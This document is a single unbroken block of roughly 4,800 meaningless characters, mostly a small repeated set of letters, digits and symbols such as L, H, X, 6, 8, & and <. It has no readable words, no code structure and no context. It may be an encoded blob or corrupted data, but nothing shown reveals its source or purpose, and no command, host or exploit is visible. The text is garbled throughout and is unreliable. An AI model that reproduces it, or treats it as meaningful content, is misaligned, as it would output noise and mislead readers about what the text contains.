LHgX6_DHD8_w_gDXDhXwXUgDUg6LLDLX6U_wDDDE_EEgE<HX86&&wBg66X<LLww<_BH6DS&H&HEEgh<8&_L&wD6B<hD8X_XLgggg8G&EgEgX6<<HL8wE_UHXHX__&wpLg*&*LBw_6Ehgh<D68UhBWLBB8B&&H6g&X_E_DDU&_XhwgV6E&wHgHXU8LD0r8L&Bh<D86<XXL8UL8h)6LH8D_w+DgU8<X8L8D8_h&DPgww6&<BB8B8<gDhBhB&E8L8BU_Eh_D<gXX8hXB8_EXBh&HUUUX&I&gX6LL&waBD_gEwH&8Bp8dUUw6LEhi&68XL/6gX6LX8hEgg86yBMHUh_hhgDBUB6X%Hwh8whhgBg<UH&ELEwH_HhDDUXHXDH6Hh&H&Egbw6<XhHBwBghXE88wULJX7Eg86BLELE6dhDhwB?8UEBE68uUwLBL_wD_LD_D__Xh<E68X8_!<LLg66UDLDL6E_DHwH68LX#g6H?&8&_wg66_D<hD<_<EHE_D.8&&&E%gxUE<wwpwEhBhXBI8RE<#Dg_<w<BgLgC<XEgDw8w<XLhg<8&hDwBg86U<vL&_E_DEgD_BhXBEE6DU6L&L&wU_8DeHL6<XXH6HwXC<zLBwUXU&<HwUC_8HXHX_UcDb_U8Uw#vV.8H6&hUHg6g<DE_UD&X&Lg&wB6w<DL<U__&L_g &8&HpXUh6BLXLL6&_8EEgB6g_6hEHBU_9hH5g<<URBL&wX<gh^DX8&&HwHgg6w<<L6_&_&L68H8XE_EBUL_h<DHXg<&D<<g8B6EHH&HDX<hhDDgBUE&_Hg8<&XHUDX8<XHE8HEUULXLD_w_whHDL8gEhELgH86X<uwghhL<UBHBDh<E68HUHE<0DU_&&&Ew_wX<rhwB_B<E8H6Hh&8&Bg<w<<8<&Bg_6XDhhH<&BX6PXgLUw&<LB_6_<DXD_Xw&LHXHe&w&_wD6g_gDDDH_U_<HhgD8_&6wDgX&k<HBBB__DEL8_8LEXH<gD&X&_wLBL<XhXBU_<XBEDgLXh&6EEgX6X&ELEwh_gDEHXXwXUHEgg&&<LL6_g_w.7LE__X6L8gH6EhnLh8L_BDwLBB8_EhX8h8L&HE6H<Uw&hBLwUhXhXD88BEEE}B&U_;UygUE_EhwD8U86&kgwE8B)_+_88<L<6wBwg<EhXHLUX_<b&ww_H<hwL6_UPLXDwUE_vL8Hh8<<3DD6B6D<_w<Bwh_<3BXBw<LDBBU8hEBHL8_<<n<wHBLh&hhw&UUXhD8w666&<B8wU_6ELD<X^XuD<U8UEV&b_6w_EdUDgB<XXEDg86LO8g/gB<L#DL<U_&DTwH6UEX&g&HE6L&8=XwH6&DEDUXLXDHXH_&L&BgXgh<UL_LE_U_8DhHHXUXXgwwDU_<6BDw6hghw8B8_XDMLU_Uh{UTX6D6wDUD&BgXHH&HdX<EERDU<UhLEDHwX__HHD&XLXgHXH^<L<w9<w&hwh6BB_XXgEDDlUH}<E?wDUU&&Lgw<hlEg8_8_XBpwUhUL<HY6g<6w<h8LBUEXEXH8UBQH?hggUe<-LgBg_Hh68g8yE_E<UgU6LLLBwhh6h_wwBghEL&wD8hX8DGg8U_NgB_wX_&EgDM&HXB1UHhUD&_LH_B6<DbDsB&XXgggwXL&Eg<g6<gEgD_B&&&hLg6_gXXgEgEX&LBLh6X66DgwBU&<whEwL_hhULD6B<E<wwQU_<LE6H_U)<&DUHT<X<8LE_D__DEDw_e<_LEBL6<h_Hg8L&HDDwD6U_BHLH666hUD_wg_wEDH<_&6<hhHB8D)w!w8D&&<gwggE<_hUL6whXUh&HD8X&&g&6wUXLBDLBU&&E6Dh8ghgLU6LUg<Be&gy6UhL8gBXEhEhH&8_&<w8g_6&<DLBwh_8H_HLX&X<gBgw&&&EwBw6hHDwDUXHXDgwg6UL&,w6wD<8<_BLBBhhD2HHXhX<ggg8&h<LwX6j_6hwHgX<_f%DHU8&&gI<6f_gDDDH_&_<HDgDX&XEwDwBUh<<BBwEh8D6DhX8XUH<g<&8&&wg6B_BDgDC___EHggg&LQBeEgX6_L_LBBU6hhDD_8HyBaB8wUt&&LX6XhLDwB_B&_hEEgB8ILLLDwB&HL<DHB_6NEHH68wXDgggHUwLgLXwL6<h<DL8L_pEBUL&w&LLHg6U<<wLhXLX8LBwDUEM_y_gB6wLwgUw&6hhEHBBNSLh&Bh8&s8DHBh&H<HgH8D_BL&UD8UX_wLgD&<<_LgBH66<XwDU6XBD<gLUH<gLXwwhBh8wHBLh&hBg/8<X_q_g6UHh&g&wV_DEHH_8gTwt68D8*ZXLEwX66hwgL8<X8k<BX8E&LLDw66HDgL66L6ED_g_8;&DDDH86EE_LLU_6h<nHL8UXDgHHB_eXhg68XX6E_gwBE&Hh&gh_6X<EEgJ68<LBDBL68hHHHB8X8EBH&&E&ULg6B6&L&wE_gh6HHHw88&U4Eg6<_<8g8w_hBhhB&Xw_8H68h&HX6wDBw<gh<B8_<EDHw8__<&LfHwg6X<wBBw<<HhLB&UB<hLRBBU&&gL6gh&&<UBHUX&8EBHg66<rLLHE<B<<LHwE_EhHHH8DXUgHU8ULn&zUgs6B<&HgBH_}E68E&H&HH6g<<w<Lw&8&XDEgwgB6<LD&gH<8<8LHBDhDhgDB88XhEUU6UUXh>_w_Uh<hL<BHEBEB8U86Ehl_UXUJ<UBHBHh<<hDE88XHgBH6UX&L-wg<6BD6L5XHXHhEHh_&XhHgg_&t<Dg_Bw_Lh.868DXgewg&UBL8pn6w6ULEL<6UXgH8DZXX<wD<BEXw<XLHBU6<D_HwXgX3Hhg8&U&wgO8DX&EXL_BU<X*_g&&DEwr6gX6&hHL<_h_<hHDE8EXH#HgDUULXLL6<hLhHDw8BX<E8UUULFB(68EU<LUH_Ug&HhDDS_H<DLgUXUZLLL<6E6UDHgH86XXLXDZ6UEHv_6DUEL_DhB__UEggRU&&BL&U&&h<_w&ww<MLDDL6UX8LEHB_D&XgEg&<8<_gHw_X_L_g&8&&wg6U&UULH2<88_ghLHLB+__LHUwXU<Hwwgh<6<HH<B__8E8HBB7<6gX8hU&<hLgwU6ih68g8HE&E8UD8&&6L<wh6<iHghw5EgH8HXXL&&jUw8&w<6LXB&XHh<8hBhhXE6H=UD<8gBw_6&h<HgBhEEhEB&8_zwLE88X6EEDww<XDh88!86XXb&wHU<LhL<wH6EhEDH8HXDEUUX6LO<wLwH6whBD<B8EUE6Bw86KggU8XUE<LDDB6_HHgHg_LXwH)UgX8&Xv<wh_w<EB 8g<<hX8B6B&&.hBhUHhXgBw<<Bh_D&8<&gEhUEUIE&wBw8<1hUBBBHhhPhggUBhBEXBHXh<ww<w_hw/hDg6<X7LXgX6&<&w86XhD<XBBw3&_E8HgUg&HE<BB_H<Dw<U8XBigHh_LX<D6B_&ELgw8BH<LhwD88UXEE6U_ULE8e<6B6hL&wX_LhXD6BKX<hKSggB68<hLU_6_6LBB!XwEwHBUH6H&_wHwX<6L8w<_XhNDHH_UDowIg8_XELLw<w8_Uh/D&XEXX*HUBUEEXH)g<<h<UD68L_<HdHHUwXXEEg8U4DHDH_HhDL&H88wXH?BU>U8E<ghU6_ULLBH6<XUEggHXL&&t_gU6X<&Dg_8_BL&BLXLEUH68X&h&UL6BL6<DrDH8w_XhEH88)NXLg8/&wL8BHBQ_UE88U8SEag8UH&_%hw_6E6h<vBE88E8Hh8X&LSwwL6B&6hgLMBE<<hXH<8HX8EEgU<X&&w8BX_DhXHU6<<HeBwB&_<DgxwH<6L_w>_Hh8HB8_&L&<gUU>66LHwE6_XHDLB6X8E&gL8gUE&XL_UU6&<hDE8B_.gLgg_h&DH_ghU?hLDUBDEHEDDU8g&gEUgUU8&<w}w_hDhLBXB<_EE5g8ULLDZXUL6U<OBHBD_BhB8E8BEVE_gX6H&EBDw6&EhEBhXDhwE&gg&8&BH&UL<HLEL6B_XDhhUL8g&BE&H7UU<Lw<_D<HhhD_86h8CDHhU<EXYEUH6LL&gw8{X^L_wD6LhUMUUE6gLwDL_H<ED6B8XBEU0gUBXh7&g866<&<hBg_wEDDwH.&D&LgXg<UE<oD8BLEDEDwEXEFg*wgLUHL_LLU8hLL<BUBHEgHBUg8vLLLDg&<;<bg<B_hBDXD_Xw<hL6w6XHhXD_UL_LDUD6_hXLHUHX&w&hl_w6hD<wD8w<_Lh6HD&w&wHggEUX<_gUw&6hhEHBB%OLELBh&<&Lg&g__XEoD8BL<8EwwLXE&6g6UE6E%&g&6&XHLiBLX8E_HEDEXwqBw&ww68hUDEB6E_E_B88XEH;8g66_hLLX_&_XhLD<8<XL7LHrUBL6L<wh<*LEBg_6EHhEgL88XX,Hg&UgLBwX6}6BD&D6XgX<LEgU_6hDH_wX6gD8B<XBE8H88_XEGgghw86HhDBXBg_BE8Hh8Uy6ZUHhU_<_khwh6<hH8BB<XXH<ULUH&wLBw<68DUDw6w6&<EBB8_X&A<wgUhLEDLU&6H<Bw<8LXHTggXUwLBLBUHU_&<wgBU__EXgD8&!<EU8_UL<hw_BHhgh8HL8HEU1gHLXU&&jhwE_B<P8L8L<hED8<&L&H}wwB6<<8BUB8<w<&LE8XX8E6UZ6LE<gh6U_gDhDEB6E<EBHUU6&+d_6X6gNUL8_8hXLhHD8g&wT&gB<8&hgBw<_wDUD66<hDHD8P8_&XLHgEhD<6gE_6_HHH88B8h<g&H68&LwgUBH_L<EHD8HXXHhHEXHEUg66BUYhLD6BwEU
